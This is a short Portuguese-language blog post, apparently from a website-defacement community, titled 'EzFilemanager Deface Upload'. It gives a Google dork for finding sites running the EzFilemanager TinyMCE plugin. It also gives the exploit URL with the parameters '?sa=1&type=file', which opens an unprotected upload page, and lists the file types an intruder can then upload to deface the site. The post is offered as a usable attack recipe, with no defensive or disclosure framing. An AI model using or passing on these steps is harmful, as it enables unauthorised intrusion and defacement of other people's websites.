EzFilemanager Deface Upload

Postado em 21:13 by Administrador

Dork para EzFilemanager é "inurl:ezfilemanager/ezfilemanager.php"
(Você pode modificar esse dork para obter mais resultados no google)
Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Ir para este URL:  website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php e colocar ?sa=1&type=file depois da URL
agora url será: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Agora ver a opção de upload e você pode fazer o upload, html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png

Sem resposta para "EzFilemanager Deface Upload"